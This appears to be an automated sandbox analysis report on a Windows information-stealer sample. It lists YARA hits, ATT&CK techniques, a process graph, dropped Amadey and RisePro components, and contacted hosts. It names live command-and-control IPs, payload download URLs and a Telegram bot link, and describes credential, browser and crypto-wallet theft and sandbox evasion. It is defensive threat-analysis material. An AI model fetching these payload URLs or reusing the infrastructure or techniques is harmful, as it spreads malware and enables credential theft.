                              Source: Yara matchFile source: 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: c884f8452a.exe PID: 7988, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 1864, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\L6h0MKsU674R9uRTEifr_26.zip, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lGaQRZaI9ZBmSkbqM2Ghh6s.zip, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                              Windows Management Instrumentation                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		11
                              Disable or Modify Tools                              		2
                              OS Credential Dumping                              		1
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		12
                              Ingress Tool Transfer                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Native API                              		11
                              Scheduled Task/Job                              		112
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		11
                              Input Capture                              		2
                              File and Directory Discovery                              		Remote Desktop Protocol4
                              Data from Local System                              		11
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts2
                              Command and Scripting Interpreter                              		111
                              Registry Run Keys / Startup Folder                              		11
                              Scheduled Task/Job                              		4
                              Obfuscated Files or Information                              		1
                              Credentials in Registry                              		347
                              System Information Discovery                              		SMB/Windows Admin Shares1
                              Email Collection                              		11
                              Non-Standard Port                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts11
                              Scheduled Task/Job                              		Login Hook111
                              Registry Run Keys / Startup Folder                              		12
                              Software Packing                              		1
                              Credentials In Files                              		1071
                              Security Software Discovery                              		Distributed Component Object Model11
                              Input Capture                              		3
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Timestomp                              		LSA Secrets2
                              Process Discovery                              		SSHKeylogging114
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              DLL Side-Loading                              		Cached Domain Credentials591
                              Virtualization/Sandbox Evasion                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                              Masquerading                              		DCSync1
                              Application Window Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job591
                              Virtualization/Sandbox Evasion                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Rundll32                              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428500 Sample: SecuriteInfo.com.Win32.Evo-... Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 119 b-stamps.gl.at.ply.gg 2->119 121 api.ip.sb 2->121 123 2 other IPs or domains 2->123 151 Snort IDS alert for network traffic 2->151 153 Found malware configuration 2->153 155 Malicious sample detected (through community Yara rule) 2->155 157 17 other signatures 2->157 10 explorha.exe 2 28 2->10         started        15 chrosha.exe 2->15         started        17 SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe 5 2->17         started        19 10 other processes 2->19 signatures3 process4 dnsIp5 145 193.233.132.167, 49715, 49720, 49722 FREE-NET-ASFREEnetEU Russian Federation 10->145 147 193.233.132.56, 49713, 49714, 49716 FREE-NET-ASFREEnetEU Russian Federation 10->147 95 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 10->95 dropped 97 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 10->97 dropped 109 9 other malicious files 10->109 dropped 197 Creates multiple autostart registry keys 10->197 199 Hides threads from debuggers 10->199 201 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->201 21 c884f8452a.exe 10->21         started        26 amert.exe 10->26         started        28 831840b410.exe 10->28         started        38 3 other processes 10->38 99 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 15->99 dropped 101 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 15->101 dropped 103 C:\Users\user\AppData\Local\...\build12.exe, PE32 15->103 dropped 111 4 other malicious files 15->111 dropped 203 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->203 30 build12.exe 15->30         started        32 build12.exe 15->32         started        34 rundll32.exe 15->34         started        105 C:\Users\user\AppData\Local\...\explorha.exe, PE32 17->105 dropped 205 Detected unpacking (changes PE section rights) 17->205 207 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 17->207 209 Tries to evade debugger and weak emulator (self modifying code) 17->209 217 2 other signatures 17->217 36 explorha.exe 17->36         started        149 127.0.0.1 unknown unknown 19->149 107 C:\Users\user\...\L6h0MKsU674R9uRTEifr_26.zip, Zip 19->107 dropped 211 Antivirus detection for dropped file 19->211 213 Multi AV Scanner detection for dropped file 19->213 215 Binary is likely a compiled AutoIt script file 19->215 219 5 other signatures 19->219 40 4 other processes 19->40 file6 signatures7 process8 dnsIp9 137 147.45.47.93 FREE-NET-ASFREEnetEU Russian Federation 21->137 139 ipinfo.io 34.117.186.192 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 21->139 141 db-ip.com 104.26.5.15 CLOUDFLARENETUS United States 21->141 87 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 21->87 dropped 89 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 21->89 dropped 91 C:\Users\user\...\lGaQRZaI9ZBmSkbqM2Ghh6s.zip, Zip 21->91 dropped 159 Multi AV Scanner detection for dropped file 21->159 161 Detected unpacking (changes PE section rights) 21->161 163 Tries to detect sandboxes and other dynamic analysis tools (window names) 21->163 177 5 other signatures 21->177 42 schtasks.exe 21->42         started        44 schtasks.exe 21->44         started        46 WerFault.exe 21->46         started        93 C:\Users\user\AppData\Local\...\chrosha.exe, PE32 26->93 dropped 165 Antivirus detection for dropped file 26->165 167 Machine Learning detection for dropped file 26->167 169 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 26->169 171 Binary is likely a compiled AutoIt script file 28->171 48 chrome.exe 28->48         started        143 b-stamps.gl.at.ply.gg 147.185.221.19 SALSGIVERUS United States 30->143 173 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 30->173 179 2 other signatures 30->179 51 conhost.exe 30->51         started        181 2 other signatures 32->181 53 conhost.exe 32->53         started        55 rundll32.exe 34->55         started        183 3 other signatures 36->183 175 System process connects to network (likely due to code injection or exploit) 38->175 58 rundll32.exe 23 38->58         started        60 2 other processes 40->60 file10 signatures11 process12 dnsIp13 62 conhost.exe 42->62         started        64 conhost.exe 44->64         started        115 192.168.2.5, 443, 49703, 49705 unknown unknown 48->115 117 239.255.255.250 unknown Reserved 48->117 66 chrome.exe 48->66         started        69 chrome.exe 48->69         started        71 chrome.exe 48->71         started        81 2 other processes 48->81 185 System process connects to network (likely due to code injection or exploit) 55->185 187 Tries to harvest and steal ftp login credentials 55->187 189 Tries to harvest and steal browser information (history, passwords, etc) 55->189 73 netsh.exe 55->73         started        191 Tries to steal Instant Messenger accounts or passwords 58->191 193 Uses netsh to modify the Windows network and firewall settings 58->193 195 Tries to harvest and steal WLAN passwords 58->195 75 powershell.exe 26 58->75         started        79 netsh.exe 2 58->79         started        signatures14 process15 dnsIp16 125 www.youtube.com 66->125 127 accounts.youtube.com 66->127 135 3 other IPs or domains 66->135 129 play.google.com 74.125.138.101 GOOGLEUS United States 69->129 131 142.250.105.100 GOOGLEUS United States 71->131 133 142.250.9.104 GOOGLEUS United States 71->133 113 C:\Users\user\...\246122658369_Desktop.zip, Zip 75->113 dropped 221 Found many strings related to Crypto-Wallets (likely being stolen) 75->221 223 Loading BitLocker PowerShell Module 75->223 83 conhost.exe 75->83         started        85 conhost.exe 79->85         started        file17 signatures18 process19

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe54%VirustotalBrowse
                              SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe50%ReversingLabsWin32.Trojan.Znyonm
                              SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe100%AviraTR/Crypt.TPM.Gen
                              SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Temp\1000187001\build12.exe100%AviraHEUR/AGEN.1305500
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe100%AviraHEUR/AGEN.1305500
                              C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe100%AviraTR/AutoIt.zstul
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll100%AviraTR/PSW.Agent.szlsq
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll100%AviraTR/ClipBanker.tbxxw
                              C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Temp\1000187001\build12.exe100%AviraHEUR/AGEN.1305500
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll100%AviraTR/PSW.Agent.szlsq
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll100%AviraTR/ClipBanker.pjgxt
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe100%AviraTR/AutoIt.zstul
                              C:\Users\user\AppData\Local\Temp\1000054001\amert.exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1000187001\build12.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe100%Joe Sandbox ML
                              C:\ProgramData\MPGPH131\MPGPH131.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\RageMP131\RageMP131.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1000187001\build12.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1000054001\amert.exe100%Joe Sandbox ML
                              C:\ProgramData\MPGPH131\MPGPH131.exe51%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll96%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll82%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe33%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe77%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll82%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll80%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll92%ReversingLabsWin64.Trojan.Amadey
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll80%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe41%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe51%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe43%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll71%ReversingLabsWin64.Trojan.Amadey
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll78%VirustotalBrowse
                              C:\Users\user\AppData\Local\RageMP131\RageMP131.exe51%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe50%ReversingLabsWin32.Trojan.Znyonm
                              C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe54%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\1000054001\amert.exe43%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe33%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe51%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\1000187001\build12.exe77%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\1000188001\build12.exe77%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe43%VirustotalBrowse
                              C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll82%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll80%VirustotalBrowse
                              C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll71%ReversingLabsWin64.Trojan.Amadey
                              C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll78%VirustotalBrowse
                              C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll96%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll82%VirustotalBrowse

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              SourceDetectionScannerLabelLink
                              play.google.com0%VirustotalBrowse
                              www3.l.google.com0%VirustotalBrowse
                              b-stamps.gl.at.ply.gg2%VirustotalBrowse
                              ipinfo.io1%VirustotalBrowse
                              api.ip.sb0%VirustotalBrowse
                              www.google.com0%VirustotalBrowse
                              accounts.youtube.com0%VirustotalBrowse
                              db-ip.com0%VirustotalBrowse
                              youtube-ui.l.google.com0%VirustotalBrowse
                              www.youtube.com0%VirustotalBrowse

                              URLs

                              No Antivirus matches

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              youtube-ui.l.google.com
                              		64.233.185.136
                              		truefalse
                              www3.l.google.com
                              		108.177.122.101
                              		truefalse
                              play.google.com
                              		74.125.138.101
                              		truefalse
                              ipinfo.io
                              		34.117.186.192
                              		truefalse
                              www.google.com
                              		142.250.9.99
                              		truefalse
                              b-stamps.gl.at.ply.gg
                              		147.185.221.19
                              		truetrue
                              db-ip.com
                              		104.26.5.15
                              		truefalse
                              accounts.youtube.com
                              		unknown
                              		unknowntrue
                              api.ip.sb
                              		unknown
                              		unknowntrue
                              www.youtube.com
                              		unknown
                              		unknowntrue

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://b-stamps.gl.at.ply.gg:30946/true
                                http://193.233.132.56/Pneh2sXQk0/index.php?wal=1true
                                  http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dlltrue
                                    http://193.233.132.167/lend/build12.exetrue
                                      https://www.youtube.com/accountfalse
                                        https://www.google.com/favicon.icofalse
                                          http://193.233.132.167/cost/random.exetrue
                                            http://193.233.132.167/cost/sarra.exetrue
                                              http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dlltrue
                                                http://193.233.132.167/mine/random.exetrue
                                                  http://193.233.132.167/enigma/index.php?wal=1true
                                                    http://193.233.132.56/Pneh2sXQk0/index.phptrue
                                                      http://193.233.132.167/enigma/index.phptrue
                                                        http://193.233.132.167/enigma/Plugins/cred64.dlltrue
                                                          http://193.233.132.167/enigma/Plugins/clip64.dlltrue
                                                            b-stamps.gl.at.ply.gg:30946true
                                                              https://play.google.com/log?format=json&hasfast=true&authuser=0false
                                                                https://ipinfo.io/widget/demo/81.181.57.52false
                                                                  http://193.233.132.167/mine/amert.exetrue
                                                                    https://db-ip.com/demo/home.php?s=81.181.57.52false

                                                                      URLs from Memory and Binaries

                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://duckduckgo.com/chrome_newtabc884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://duckduckgo.com/ac/?q=c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://www.youtube.com/accountM)831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            https://db-ip.com/demo/home.php?s=81.181.57.52rMPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              https://db-ip.com/c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                http://193.233.132.167/cost/go.exeriseproMPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000012.00000003.2839947296.0000014EAB780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    http://193.233.132.167/cost/go.exec884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      http://193.233.132.167/cost/go.exe0.1MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2803800897.0000029E9006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          https://t.me/risepro_botisepro_botc884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            http://193.233.132.167/cost/lenin.exe/MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              http://www.winimage.com/zLibDllDpc884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmpfalse
                                                                                                https://t.5UHKRageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.2784637428.0000029E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://ipinfo.io/widget/demo/81.181.57.52Ec884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://t.me/risepro_botrisepWRageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://db-ip.com/demo/home.php?s=81.181.57.52-RageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  https://ipinfo.io/widget/demo/81.181.57.52Lc884f8452a.exe, 00000014.00000002.3272062949.000000000168F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      https://db-ip.com/rRageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dllc884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmpfalse
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://ipinfo.io/widget/demo/81.181.57.526RageMP131.exe, 0000002D.00000002.3206727588.00000000017FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://crl.ver)svchost.exe, 00000012.00000003.7080004981.0000014EABA8D000.00000004.00000020.00020000.00000000.sdmpfalse
